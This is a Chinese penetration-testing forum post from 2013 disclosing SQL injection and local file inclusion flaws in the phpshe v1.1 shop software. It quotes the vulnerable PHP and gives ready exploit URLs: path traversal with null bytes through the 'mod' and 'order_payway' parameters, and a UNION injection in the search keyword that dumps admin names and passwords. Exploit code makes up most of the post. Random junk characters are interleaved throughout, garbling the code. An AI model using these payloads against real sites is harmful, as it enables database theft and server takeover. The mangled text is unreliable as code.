找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpshe v1.1多处SQL注入和文件包含漏洞Getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2098|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-4-16 16:45:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/
; r: ]& ], ?3 {" K# `/* Phpshe v1.1 Vulnerability
  \/ c, ^4 h/ H/ g/* ========================
& O. A% z6 ^: c/* By: : Kn1f35 p5 _- w' G% s& q$ O: @2 t
/* E-Mail : [email protected]
6 w7 K9 @$ i+ g/ A7 q/*******************************************************/
! g: z; p2 [6 h/ @% _0×00 整体大概参数传输
" X$ C( Y8 i3 h. ^& {1 ~" @   y2 B  o8 [* a8 z! k+ a
% v. Y. o( |  v" q# `. X
$ I5 s* p% m: X, ]1 A
//common.php
' m/ |8 a" D" S4 n5 `if (get_magic_quotes_gpc()) {& `; p" K# N; y; ?+ q1 D% O
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');' z" P. p3 B' U
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');- R7 x: \/ A  l# _
}; |3 F7 `  C2 ^8 C0 b
else {9 X4 ^" m, K+ a4 D& M, f
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');0 Z1 U$ U# [5 V+ _
!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
; I" C, r( Z: ]- _' H; U- z& A4 B' p}
7 m# {5 o/ p9 O2 b  x( Hsession_start();
% _0 P7 ^# H8 m+ [!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
' ^9 y( [4 O% L- I, R2 e3 _+ m!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');% D" g% k- I$ P! X+ k0 }  q' y; f" [

3 m; c. f( C7 x9 d7 A8 u) i0×01 包含漏洞3 C  ?4 W/ p# F0 d

  B, f. G9 d$ {# C+ v3 Z+ k6 A! U; ~$ Z! Y
//首页文件
  G! l; w! n  Y( z2 a3 O) f1 {<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
: {2 X. f. ]; B' d2 @; [- Xinclude("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
8 x+ e3 J; u1 Zpe_result();
, }) z4 y  s& T, z, F?>
& B* `6 J" W9 w( k9 O//common 文件 第15行开始
4 |) r" n1 ]# X( T. \. X( F( ]url路由配置
0 P- L+ U& j# d, {) y# D- v$module = $mod = $act = 'index';
  J/ i0 z1 D) W6 z7 K4 d$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
- F2 |- X  K( }! d5 [- D$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
6 `6 u+ d- s5 P  p, X# v$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
, \5 n; [: c  L  T* Q//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
6 c" o+ Q7 `0 ]9 Y: U


5 |5 R! o$ Y1 e  D* e
" e/ V! X' D& [5 V6 ^: K0 @- T2 i 0×02 搜索注入
9 b6 x6 Q- z. i( i4 c: j" } ' e0 c  G7 E! I2 D2 w
<code id="code2">

//product.php文件, B9 }; J) G$ \5 v; N
case 'list':
, Y3 d2 `3 ?$ r  X( {$category_id = intval($id);! ?  G5 B' S$ X- y" W5 C! n
$info = $db->pe_select('category', array('category_id'=>$category_id));
  m' e! g& F. \# Q' ]//搜索% N+ f3 d5 }3 M2 K5 c
$sqlwhere = " and `product_state` = 1";  I8 ^  S& I  |( u; m
pe_lead('hook/category.hook.php');% n! p6 E! G) x# ?" ^, y
if ($category_id) {
/ k3 @. P) K+ k" P4 Q1 S0 n  cwhere .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
3 x" ]* T) J; ^( s0 L9 ~}5 |! z6 U2 n. Y  I$ L: f
$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤# Q& n- ?: K7 Z( ~5 ?
if ($_g_orderby) {
/ V+ v2 v7 e/ v5 t4 ^$orderby = explode('_', $_g_orderby);7 H) Y1 k* f( G, ]
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
! D3 D2 e( a# a0 ]7 Z3 n}6 ~- J  k( A2 N4 j5 B
else {
) e0 X/ H3 [1 e$sqlwhere .= " order by `product_id` desc";/ l% J5 |9 r" h( \
}& ^' o- C: ~2 ~$ U8 Q; L
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));$ a* ]! X/ b6 I$ _& y/ \
//热卖排行3 R+ E& K* T7 J) Z8 j7 a% `
$product_hotlist = product_hotlist();9 r# ~( H4 U$ o8 t3 j/ Z3 L& _
//当前路径
5 [+ c- t$ Q$ E0 Q9 z# `+ W! m: e$nowpath = category_path($category_id);
* ^1 @1 a' E5 g& H) W# i$seo = pe_seo($info['category_name']);( ]2 U! T& v+ f$ X4 j
include(pe_tpl('product_list.html'));4 A0 \+ b! R1 t  J+ w
//跟进selectall函数库: {( v4 \) o4 M; t; }
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array()). B( k, ~+ v+ e6 j! Z
{+ L# D3 P/ q) D0 A
//处理条件语句; [& @# N; q0 @! a& W- @& V
$sqlwhere = $this->_dowhere($where);( y2 G# u; x7 A6 p. g( c; n& C
return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);) `% \& T6 T( ~) N9 s/ U
}
' \! O( V9 [. _; f# ]# ]' ]0 B//exp
3 |9 \$ N8 v& g$ H) i1 Bproduct/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
! v+ i1 w2 v+ `8 W, E' X' f

</code># }6 a/ E  [0 O5 i7 r' `  Q
9 N0 i0 `% e7 |* ^7 o
0×03 包含漏洞2
* k! K. P- D% s4 k5 N8 n% l' v: W9 t
3 d8 c0 F3 j8 K& G. T, n% }4 N<code id="code3">

//order.php

case 'pay':

  c* W4 y# Z) i- t' l* Q* D) t/ i
$order_id = pe_dbhold($_g_id);


9 r. S# e: q. {2 {3 ~$cache_payway = cache::get('payway');

0 z6 @& L; X$ P
foreach($cache_payway as $k => $v) {


9 M9 v1 X8 w* H+ f  f3 }* J* K0 H$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);


+ ?, F5 A7 j9 o& S/ A. }3 tif ($k == 'bank') {

) |! Q( p/ W( V9 g  @) r4 D; l; B$ O
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);


+ D, S5 q4 A, ~' K9 v5 T; u}

8 q9 x# r" p1 H: z* G
}

' u3 `7 V) o/ _7 g) \. a
$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));


3 x. y4 W9 V0 i/ x!$order['order_id'] && pe_error('订单号错误...');

! x; ?2 H3 i; v8 }9 H
if (isset($_p_pesubmit)) {

  a# E9 l+ S  Z/ ?1 z7 `" |2 `
if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {


* H' s* ^0 }- M1 d/ \, \$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));


4 ~6 V6 p& E. V( Q+ t' V3 n6 a' a( A+ qforeach ($info_list as $v) {

4 R, p5 \8 L4 m
$order['order_name'] .= "{$v['product_name']};";$ a  c7 P/ S, I3 ]' E


- G* f* D0 o0 l3 G& w0 `}


9 J: b6 x' m' z6 ~9 c! A8 kecho '正在为您连接支付网站,请稍后...';


2 s2 D. e5 Y6 k9 J, `5 R% X$ l! Winclude("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

9 ?1 U7 }4 G% Y& M, S
}//当一切准备好的时候就可以进行"鸡肋包含了"

# [8 ^3 v/ I+ \& H6 ^; R
else {


2 H; T% B  B8 J0 tpe_error('支付错误...');


- ]$ Y0 E: G3 R5 ]0 X) s9 B1 _5 g}

- a) j* A9 p) Z; |/ ~
}

6 d, C  q: M3 M
$seo = pe_seo('选择支付方式');


' }6 M# W  j3 b7 L: S2 d: zinclude(pe_tpl('order_pay.html'));

/ u: r/ Z9 X+ O  B* |. K
break;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
  O1 h9 X/ W5 |7 x& Ohttp://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表